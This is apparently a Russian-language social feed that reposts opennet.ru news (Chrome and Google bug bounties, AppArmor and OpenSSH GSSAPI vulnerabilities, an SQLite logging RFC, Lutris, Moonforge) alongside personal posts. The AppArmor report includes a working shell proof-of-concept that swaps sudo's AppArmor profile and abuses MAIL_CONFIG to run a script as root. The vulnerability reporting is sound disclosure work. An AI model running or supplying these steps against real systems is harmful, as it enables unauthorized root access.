Кроме нововведений и исправления ошибок в новой версии устранено 29 уязвимостей. Многие из уязвимостей выявлены в результате автоматизированного тестирования инструментами AddressSanitizer, MemorySanitizer, Control Flow Integrity, LibFuzzer и AFL. Одной из проблем (переполнение буфера в WebML) присвоен критический уровень опасности, подразумевающий, что уязвимость позволяет обойти все уровни защиты браузера и выполнить код в системе за пределами sandbox-окружения. В рамках программы по выплате денежного вознаграждения за обнаружение уязвимостей для текущего релиза компания Google учредила 29 премий и выплатила 211 тысяч долларов США, что стало рекордом по размеру выплат в рамках одного релиза (две премии $43000, по одной премии в $36000,
$33000, $11000 и $7000, по две премии в $10000 и $3000, по 4 премии в $2000 и $1000). Размер 12 вознаграждений пока не определён.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64979
@continue благодарю)
Экзотика или...? Об OpenBSD с Вячеславом Воронцовым
(#openbsd)
@contrinitiator Поздравляю!)
@continue Получается так!
@contrinitiator
Ого! Так ты в chaosss.press устроился?
Вышла-таки первая книжка от нашей команды. Не исключено, что в некоторых странах можно угодить в каталажку даже за чтение этого маллеуса малефикарума!
(#чтопочитать, #books)
Вышла-таки первая книжка от нашей команды. Не исключено, что в некоторых странах можно угодить в каталажку даже за чтение этого маллеуса малефикарума!
(#чтопочитать, #books)
В соседний двор пришла весна.
@iron_bug @vovanium Это да.
Уязвимости в AppArmor, позволяющие получить root-доступ в системе
Компания Qualys выявила 9 уязвимостей в системе мандатного управления доступом AppArmor, наиболее опасные из которых позволяют локальному непривилегированному пользователю получить права root в системе, выйти из изолированных контейнеров и обойти ограничения, заданные через AppArmor. Уязвимости получили кодовое имя CrackArmor (CVE-идентификаторы пока не назначены). Успешные примеры повышения привилегий продемонстрированы в Ubuntu 24.04 и Debian 13.
Проблемы присутствуют в LSM-модуле AppArmor начиная с ядра Linux 4.11, выпущенного в 2017 году, и проявляются в дистрибутивах, использующих AppArmor, таких как Ubuntu, Debian, openSUSE и SUSE (начиная с openSUSE/SUSE 16 по умолчанию задействован SELinux, но AppArmor оставлен в качестве опции). Патчи с устранением уязвимостей переданы разработчикам ядра и в ближайшие дни будут предложены пользователям в составе обновлений 6.18.18, 6.19.8, 6.12.77, 6.6.130, 6.1.167, 5.15.203 и 5.10.253. Исправление также включено в сегодняшние обновления пакетов с ядром для Ubuntu. Попутно в Ubuntu выпущены обновления пакетов sudo, sudo-ldap и util-linux (в состав входит утилита su), в которых устранены недоработки, позволявшие эксплуатировать уязвимость в AppArmor. В Debian обновление в процессе подготовки.
Проблемы вызваны выявлением в AppArmor фундаментальной уязвимости класса "обманутый посредник" ("confused-deputy"), позволяющей непривилегированным пользователям загружать, заменять и удалять произвольные профили AppArmor. Данная уязвимость напрямую может использоваться для отключения защиты программ и сервисов от локальных и удалённых атак (через запись псевдофайлов /sys/kernel/security/apparmor/.load, .replace и .remove, например, для снятия ограничений в cupsd и rsyslogd), вызова отказа в обслуживании (через применение запрещающих профилей) и обхода ограничений пространств имён (через загрузку нового AppArmor-профиля "userns" для /usr/bin/time, позволяющего создавать неограниченные user namespace).
Возможность замены профилей AppArmor также позволяет добиться получения root-привилегий через привязку к привилегированным утилитам, таким как su и sudo, новых профилей, блокирующих доступ к некоторым системным вызовам. В частности, права root можно получить блокировав операцию setuid (CAP_SETUID) для утилиты sudo в сочетании с манипуляцией переменной окружения MAIL_CONFIG для смены каталога с
настройками для почтового сервера Postfix.
Суть метода в том, что при возникновении проблем утилита sudo отправляет администратору письмо, запуская /usr/sbin/sendmail. Блокировав сброс привилегий можно добиться запуска данного процесса с правами root, а выставив перед запуском sudo переменную окружения MAIL_CONFIG можно передать утилите sendmail другие настройки, в том числе указать свой обработчик postdrop, запускаемый при отправке почты.
$ mkdir /tmp/postfix
$ cat › /tmp/postfix/main.cf ‹‹ "EOF"
command_directory = /tmp/postfix
EOF
$ cat › /tmp/postfix/postdrop ‹‹ "EOF"
#!/bin/sh
/usr/bin/id ›› /tmp/postfix/pwned
EOF
$ chmod -R 0755 /tmp/postfix
$ apparmor_parser -K -o sudo.pf ‹‹ "EOF"
/usr/bin/sudo {
allow file,
allow signal,
allow network,
allow capability,
deny capability setuid,
}
EOF
$ su -P -c 'stty raw && cat sudo.pf' "$USER" › /sys/kernel/security/apparmor/.replace
Password:
$ env -i MAIL_CONFIG=/tmp/postfix /usr/bin/sudo whatever
sudo: PERM_SUDOERS: setresuid(-1, 1, -1): Operation not permitted
sudo: unable to open /etc/sudoers: Operation not permitted
sudo: setresuid() [0, 0, 0] -> [1001, -1, -1]: Operation not permitted
sudo: error initializing audit plugin sudoers_audit
$ cat /tmp/postfix/pwned
uid=0(root) gid=1001(jane) groups=1001(jane),100(users)
В качестве других способов повышения привилегий упоминаются уязвимости в коде AppArmor, работающем на уровне ядра Linux. Показано как получить права root при помощи уязвимостей, вызванных двойным выполнение функции free() и обращением к уже освобождённой области памяти (use‑after‑free) в коде загрузки и замены профилей AppArmor. Например, AppArmor сохраняет профиль в структуре aa_loaddata, память для которой выделяется в slab-кэше kmalloc-192, при этом не исключено обращение к памяти, которую занимала структура, после её освобождения из-за состояния гонки. Данную проблему можно использовать для получения контроля над освобожденной памятью и перераспределения освобождённой страницы памяти для маппинга содержимого файла /etc/passwd и перезаписи строки с паролем root.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64984
@th3rdsergeevich
9-го утром в лен.области ощутил на себе интернет по белым спискам: не было соединения даже с машиной с белым IP у городского провайдера :( В городе всё ок
Уязвимость в GSSAPI-патче к OpenSSH, удалённо эксплуатируемая на стадии до аутентификации
В применяемом во многих дистрибутивах Linux патче gssapi.patch, добавляющем в OpenSSH поддержку обмена ключей на базе GSSAPI, выявлена уязвимость (CVE-2026-3497), приводящая к разыменованию указателя, повреждению памяти и обходу механизма разделения привилегий (Privsep). Уязвимость может быть эксплуатирована удалённо на стадии до осуществления аутентификации. Выявивший проблему исследователь продемонстрировал инициирование аварийного завершения процесса через отправку на SSH-сервер одного модифицированного сетевого пакета. Не исключается, что помимо отказа в обслуживании, существуют более опасные варианты эксплуатации уязвимости.
Примечательно, что в своё время разработчики OpenSSH отказались принимать в основной состав изменение для поддержки GSSAPI из-за сомнений в его безопасности. При этом многие дистрибутивы Linux включили данный патч в свои пакеты c OpenSSH. В обиходе встречается несколько версий GSSAPI-патча, но в большинстве из них имеется приводящая к уязвимости ошибка. Исправление пока доступно только в форме патча, изменения в котором сводятся к замене вызова функции sshpkt_disconnect() на ssh_packet_disconnect() в файле kexgsss.c.
В настоящее время наличие уязвимости подтверждено в Debian и Ubuntu. В остальных дистрибутивах применение проблемного патча и его подверженность уязвимости уточняется (SUSE/openSUSE, RHEL, Gentoo, Arch,
Fedora). Уязвимость проявляется только при включении в настройках опции "GSSAPIKeyExchange yes". На возможность эксплуатации также влияют опции компилятора с которыми в дистрибутивах собран пакет.
Причиной возникновение уязвимости является ошибка в функции sshpkt_disconnect(), из-за которой процесс не завершался после поступления disconnect-сообщения, что позволяло атакующему на стадии согласования ключей отправить не предусмотренный логикой работы сервера тип GSSAPI-сообщения. После поступления внепланового GSSAPI-сообщения, сервер помещает его в очередь и не прерывает выполнение программы, но при этом не инициализирует переменные, определяющие параметры соединения. В дальнейшем в цикле обработки событий выполняется код, который читает неинициализированную структуру recv_tok из стека (читаются данные, оставшиеся в стеке от прошлого вызова функции), отправляет её привилегированному процессу через IPC и затем передаёт в функцию gss_release_buffer(), которая может вызвать функцию free() и освободить память для некорректного указателя, ссылающегося на случайную область памяти.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64983
@iron_bug Бабло чтобы создать чятик и гоношить потом жителей не нужно, достаточно распоряжения.
@vovanium Во многих домах такие лабиринты. Всегда беру с собой клубок ниток.
ifixit
That’s why Lenovo’s newest ThinkPads are such a big deal: the new T14 Gen 7 and T16 Gen 5 score an eye-popping 10 out of 10 on our repairability scale.
Все парадные оклеили объявлениями с курокодами, пишут, что создали уважаемым жителям чат в МАХ, и туда надо вступить, "чтобы не потеряться"..
Уязвимость в GSSAPI-патче к OpenSSH, удалённо эксплуатируемая на стадии до аутентификации
В применяемом во многих дистрибутивах Linux патче gssapi.patch, добавляющем в OpenSSH поддержку обмена ключей на базе GSSAPI, выявлена уязвимость (CVE-2026-3497), приводящая к разыменованию указателя, повреждению памяти и обходу механизма разделения привилегий (Privsep). Уязвимость может быть эксплуатирована удалённо на стадии до осуществления аутентификации. Выявивший проблему исследователь продемонстрировал инициирование аварийного завершения процесса через отправку на SSH-сервер одного модифицированного сетевого пакета. Не исключается, что помимо отказа в обслуживании, существуют более опасные варианты эксплуатации уязвимости.
Примечательно, что в своё время разработчики OpenSSH отказались принимать в основной состав изменение для поддержки GSSAPI из-за сомнений в его безопасности. При этом многие дистрибутивы Linux включили данный патч в свои пакеты c OpenSSH. В обиходе встречается несколько версий GSSAPI-патча, но в большинстве из них имеется приводящая к уязвимости ошибка. Исправление пока доступно только в форме патча, изменения в котором сводятся к замене вызова функции sshpkt_disconnect() на ssh_packet_disconnect() в файле kexgsss.c.
В настоящее время наличие уязвимости подтверждено в Debian и Ubuntu. В остальных дистрибутивах применение проблемного патча и его подверженность уязвимости уточняется (SUSE/openSUSE, RHEL, Gentoo, Arch,
Fedora). Уязвимость проявляется только при включении в настройках опции "GSSAPIKeyExchange yes". На возможность эксплуатации также влияют опции компилятора с которыми в дистрибутивах собран пакет.
Причиной возникновение уязвимости является ошибка в функции sshpkt_disconnect(), из-за которой процесс не завершался после поступления disconnect-сообщения, что позволяло атакующему на стадии согласования ключей отправить не предусмотренный логикой работы сервера тип GSSAPI-сообщения. После поступления внепланового GSSAPI-сообщения, сервер помещает его в очередь и не прерывает выполнение программы, но при этом не инициализирует переменные, определяющие параметры соединения. В дальнейшем в цикле обработки событий выполняется код, который читает неинициализированную структуру recv_tok из стека (читаются данные, оставшиеся в стеке от прошлого вызова функции), отправляет её привилегированному процессу через IPC и затем передаёт в функцию gss_release_buffer(), которая может вызвать функцию free() и освободить память для некорректного указателя, ссылающегося на случайную область памяти.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64983
Предложение по переводу системных логов lastlog, btmp, utmp и wtmp на использование SQLite
В списке рассылки linux-api выставлено на обсуждение предложение (RFC) заменить устаревшие бинарные форматы системных журналов lastlog, btmp, utmp и wtmp на новые разделяемые библиотеки, использующие SQLite в качестве бэкенда. Инициатива направлена на решение накопившихся проблем, среди которых переполнение 32-разрядных счётчиков времени в 2038 году, отсутствие расширяемости, низкая производительность запросов и отсутствие атомарности при записи.
В настоящее время для хранения данных о сеансах и попытках аутентификации в Linux используются следующие бинарные файлы, имеющие фиксированную структуру:
- /var/log/lastlog - время последнего входа (структура "struct lastlog" с полем "ll_time" 32-разрядного типа time_t);
- /var/log/btmp - неудачные попытки входа;
- /var/run/utmp - текущие сеансы;
- /var/log/wtmp - история входов и выходов.
Формат данных файлов был разработан несколько десятилетий назад и имеет ряд фундаментальных ограничений:
- Поле "tv_sec" в структуре "utmpx" и поле "ll_time" в "lastlog" имеют тип "int32_t", значение счётчиков времени на основе которого переполнится 19 января 2038 года. Из-за требований ABI‑совместимости даже на 64-разрядных системах эти поля остаются 32-разрядными, поэтому проблема затронет все установки Linux.
- Фиксированный размер записей не позволяет добавлять новые поля (например, идентификатор контейнера, имя сервиса, IP-адрес) без полной замены формата и перекомпиляции всех утилит.
- Утилиты last, lastb, who и lastlog вынуждены линейно перебирать содержимое файлов. При большом размере журналов без использования индексов, позволяющих эффективно фильтровать записи, нагрузка на систему ввода/вывода и задержки при выполнении запросов становятся неприемлемыми.
- Запись в бинарный файл не является атомарной операцией. При сбое запись может быть частично повреждена.
- Для исключения конфликтов при одновременной записи в журтал несколькими процессами (например, sshd и login) используются flock-блокировки, которые не гарантируют атомарность и могут приводить к взаимным блокировкам.
Автор RFC предлагает полностью отказаться от бинарных форматов в пользу специализированных разделяемых библиотек, использующих SQLite. Для каждого типа журналов создаётся отдельная библиотека с единообразным C-интерфейсом: liblastlog2, libbtmp2, libutmp2 и libwtmp2. Все библиотеки работают с БД, схема которых включает 64-разрядные временные метки (тип INTEGER) и индексы по пользователю и времени. Имеется возможность добавления новых полей без нарушения совместимости (через ALTER TABLE).
Среди доводов в пользу использования SQLite упоминается использование 64-разрядного типа INTEGER для хранения эпохального времени, задействование индексов для снижения ввода/вывода за счёт выборочного обращения к записями вместо полного сканирования, возможность добавления новых полей без изменения существующих записей,
поддержка ACID-транзакций, режим WAL (Write-Ahead Logging) для конкурентного доступа без блокировок, проверенная надёжность работы SQLite.
Для обеспечения плавного перехода предлагается стратегия "двойной записи" (dual-write):
- Программы, которые пишут в бинарные файлы (login, sshd, sudo, cron и др.), модифицируются так, чтобы одновременно выполнять запись и в старый бинарный файл, и в новую SQLite-базу через соответствующую библиотеку.
- Разрабатываются новые версии утилит (last2, lastb2, who2, lastlog2), которые читают данные из SQLite-баз, используя индексы для быстрой работы. Старые утилиты продолжают работать с прежними файлами.
- Через несколько лет, когда подавляющее большинство систем обновятся, поддержка записи в старые форматы может быть отключена, а старые утилиты - объявлены устаревшими.
Вопросы, выставленные для дополнительного обсуждения:
- Целесообразность разделения на отдельные библиотеки или объединения в одну (например, libsession2).
- Выбор имён для библиотек и утилит (сохранить исторические названия или перейти к более общим).
- Расположение файлов баз данных (/var/lib/ как для состояния приложений или /var/log/ как для логов).
- Механизм версионирования схемы и миграции.
- Параметры производительности SQLite для различных сценариев (серверы, встраиваемые системы).
- Предоставление fallback-бэкенда, хранящего журналы в упрощённом бинарном формате, для систем, на которых SQLite может оказаться избыточным (например, встраиваемые устройства с жёсткими ограничениями по памяти).
Источник: https://www.opennet.ru/opennews/art.shtml?num=64981
В 2024 году Google выплатил 17.1 млн долларов вознаграждений за выявление уязвимостей
Компания Google подвела итоги программы выплаты вознаграждений за выявление уязвимостей в Chrome, Android, приложениях Google Play, продуктах Google и различном открытом ПО. Общая сумма выплаченных в 2025 году вознаграждений составила 17.1 млн долларов, что на $5.3 млн больше, чем в 2024 году и на $7.1 млн больше, чем в 2023 году. Вознаграждения получили 747 исследователей (в 2024 году - 660, в 2023 - 632). С 2010 года суммарный размер выплат составил 81.6 млн долларов.
Из потраченной в 2025 году суммы $2.9 млн (в 2024 году $3.3 млн, в 2023 - $3.4 млн) выплачено за уязвимости в Android. За информацию об уязвимостях в браузере Chrome выплачено 100 премий на общую сумму $3.7 млн (в 2024 году $2.1 млн, в 2023 - $3.5 млн). За уязвимости в открытых проектах выплачены 62 премии на сумму 327 тысяч долларов. За уязвимости в облачных продуктах Google выплачено 143 премии на сумму $3.5 млн. За уязвимости в AI-продуктах выплачено 890 тысяч долларов.
Размер самой большой единичной выплаты составил 250 тысяч долларов за обнаружение логической ошибки в IPC-механизме Chrome, позволившей создать эксплоит для выполнения кода в обход применяемой в браузере sandbox-изоляции.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64978
Delayed hibernation comes to OpenBSD/amd64 laptops
In a move that would have gone unnoticed by most but will be appreciated by OpenBSD/amd64 laptop users, Mark Kettenis (kettenis@) committed support for delayed hibernation with the new machdep.hibernatedelay sysctl
The commit message reads,
List: openbsd-cvs
Subject: CVS: cvs.openbsd.org: src
From: Mark Kettenis <<ettenis () cvs ! openbsd ! org>
Date: 2026-03-11 16:18:42
CVSROOT: /cvs
Module name: src
Changes by: kettenis@cvs.openbsd.org 2026/03/11 10:18:42
Read more…
"Говорят, если москвичу отрубить интернет он ещё два часа будет бегать и рассказывать про самые удобные сервисы"
Главный разработчик Lutris прокомментировал появление в проекте кода, созданного через AI
Основатель и основной разработчик игровой платформы Lutris, предоставляющей инструменты для упрощения установки, настройки и управления играми в Linux, прокомментировал принятие в кодовую базу проекта изменений, сгенерированных большими языковыми моделями. Разработчик заявил, что использование AI является проблемой только если человек не знает, что делает, или использует AI-инструменты низкого качества.
По словам создателя Lutris, несколько месяцев назад AI-инструментарий Claude стал генерировать вполне достойный код и благодаря AI удалось сделать всё, что было упущено в прошлом году из-за проблем со здоровьем и депрессии. Он также заявил, что предполагал возможный негатив в отношении появления изменений, подготовленных с использованием AI, и поэтому несколько дней назад удалил упоминание о соавторстве Claude из коммитов и пожелал удачи в попытках определить, что было сгенерировано AI, а что - нет.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64977
Four years of Russian internet censorship
turned into sound – project by Denis Yagodine
Eight of Russia's largest ISPs play simultaneously - each one a voice, each day a tenth of a second. Pitch follows the level of DPI filtering: the more traffic an ISP blocks, the higher it sounds. Notes are quantized to A minor pentatonic. The timbre shifts too - clean tones at law enforcement, harsh overtones at high. Sub-bass hits mark key dates: the
invasion, Instagram ban, mobilization, VPN crackdowns, YouTube throttling, mass mobile
Built from 1,493 days of per-ASN Cloudflare Radar TCP reset data (Feb 2022 - Mar 2026). Stereo, additive synthesis, 44.1 kHz. No samples, no loops - pure data.
https://soundcloud.com/denis-33470178/enforcement-8-isps-2022-2026
"Our proprietary AI robots independently recreate any open source project from scratch"
https://malus.sh/
Энтузиасты создали do-нотацию для C++
Сообщество энтузиастов написало собственный DSL на макросах, который работает как do-нотация из функциональных языков. Используются продвинутые возможности препроцессора. В представленном проекте реализована новая техника для парсинга DSL, что может поспособствовать созданию дальнейших DSL на препроцессоре C и C++. Код в репозитории написан на C++23 и открыт под лицензией MIT, а сама техника может быть использована и просто в си-препроцессоре.
// Без DSL:
auto result = bind(mx, [&](auto x) {
return bind(my, [&](auto y) {
return make_value(x, y);
});
});
// С DSL:
auto result = DO(
LET x IS(mx);
LET y IS(my);
return make_value(x, y);
);
Источник: https://www.opennet.ru/opennews/art.shtml?num=64975
Компания Igalia представила Moonforge, дистрибутив для встраиваемых систем
Компания Igalia, известная своим участием в разработке таких свободных проектов, как GNOME, GTK, WebKitGTK, Epiphany, Maemo, GStreamer, Wine, Mesa и freedesktop.org, представила проект Moonforge, упрощающий создание и сопровождение собственных Linux-дистрибутивов для различных устройств и встраиваемых систем. Начинка дистрибутива формируется на основе сборочного инструментария и метаданных пакетов от проектов OpenEmbedded и Yocto. Специфичные для проекта наработки распространяются под лицензией MIT.
Moonforge предоставляет разработчикам и системным интеграторам каркас, набор файлов конфигурации и коллекцию компонентов для формирования атомарно обновляемых системных образов, основанных на применении уже проверенных и распространённых в индустрии технологий, таких как yocto, bitbake и kas.
Для сформированных образов поддерживается упрощённый процесс установки обновлений и обеспечивается длительный цикл сопровождения. Основная цель проекта - предоставить разработчика встраиваемых систем удобный инструментарий, дающих возможность сосредоточиться на развитии специфичной для их продукта функциональности и не тратить время на задачи, связанные с формированием и поддержанием дистрибутива.
Системный образ компонуется из набора готовых модулей Yocto. Каждый модуль отвечает за определённую возможность или поддержку конкретной целевой аппаратной платформы. Например, предлагаются модули для поддержки Docker, QEMU или Podman, управления обновлениями через RAUC, формирования графического интерфейса на базе композитного сервера Weston, запуска браузерного интерфейса на базе Webkit для интернет-киосков и сборки для плат Raspberri Pi 4 и 5.
Поддерживается три канала распространения релизов: stable (стабильная LTS-ветка), next (ветка, в которой развивается следующий LTS-релиз) и main (экспериментальная ветка, в которой ведётся разработка). Каждая ветка привязана к своей версии набора компонентов Yocto. Стабильная ветка обновляется раз в месяц и соответствует LTS-релизам Yocto.
Обновления доставляются в режиме OTA (Over-The-Air) с использованием инструментария Mender и устанавливаются атомарно через замену целиком всей системы. На накопителе создаётся два идентичных корневых раздела - активный и пассивный. Новое обновление устанавливается в пассивный раздел, никак не влияя на работу активного. После перезагрузки разделы меняются местами - раздел с новым обновлением становится активным, а прошлый активный раздел переводится в пассивный режим и ожидает установки следующего обновления. Если после обновления что-то пошло не так, осуществляется откат на прошлый вариант системы.
Для создания системных образов используется инструментарий BitBake, а для формирования конфигурации и обеспечения воспроизводимых сборок - kas. Сборки, обновления, отчёты об уязвимостях и метаданные SBOM (Software Bill of Materials) автоматически собираются и публикуются с использованием систем непрерывной интеграции и непрерывного развёртывания (CI/CD). Сборочная инфраструктура на базе Moonforge может быть развёрнута как на локальных серверах, так и в публичных или приватных облачных окружениях.
Для прозрачности и предсказуемости процессов создания производных продуктов в дистрибутиве применяется жёсткое разделение между upstream- и downstream-компонентами, позволяющее разработчикам при необходимости добавлять дополнительную функциональность поверх базовой начинки. Конфигурация определяется в декларативном представлении, используя формат YAML, и охватывает такие области как подключение внешних репозиториев, активация модулей Yocto, управление зависимостями между компонентами дистрибутива, применение дополнительных патчей и изменение применяемых по умолчанию системных настроек.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64974
@liilliil
Думаешь это те самые (вернувшиеся из Дубая) эскортницы?
Мой признак весны этого года: уже который день наблюдаю в вагонах метро девушек, наносящих макияж.
(#сегодня)